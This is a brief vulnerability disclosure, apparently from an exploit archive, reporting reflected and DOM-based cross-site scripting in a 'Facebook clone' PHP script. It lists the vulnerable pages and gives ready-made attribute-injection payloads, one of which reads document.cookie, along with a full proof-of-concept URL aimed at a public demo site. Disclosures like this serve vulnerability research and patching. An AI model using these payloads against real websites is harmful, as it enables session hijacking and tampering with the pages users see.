Social Book Facebook Clone Script suffers from a cross site scripting vulnerability.
ea240a98db0c1a0fadf3d64b54b39e49a30d2cbc394db025127e7210f8992406
# Exploit Title: Social Book Facebook Clone Script Reflected XSS Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
ISSUE
XSS can be done using the command input
Vulnerable Page:
signup.php
lostpass.php
login.php
index.php
help_tos.php
help_contact.php
help.php
Example:
index.php"onmouseover=prompt(XSS CODE and DOM CODE)>
Exploit:
Reflected XSS: index.php/"onmouseover=prompt(document.cookie)>
DOM Based XSS:
index.php/"onmouseover=prompt('window.location(http://google.com)')>
POC:
http://www.clonescriptsoftwaredemos.com/facebook/index.php/%22onmouseover=prompt('window.location(http://google.com)')%3E
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr